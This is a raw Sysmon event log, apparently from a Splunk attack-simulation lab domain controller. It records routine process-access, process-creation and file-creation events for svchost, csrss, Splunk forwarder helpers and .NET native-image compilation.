13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.978{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.555{59A5CD1D-9237-6005-1E04-00000000A301}40523104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.274{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.914{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.914{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.899{59A5CD1D-9238-6005-2204-00000000A301}47563792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:48.820{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\88c-0\System.Data.OracleClient.dll2021-01-18 13:50:48.820 10341000x80000000000000008421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 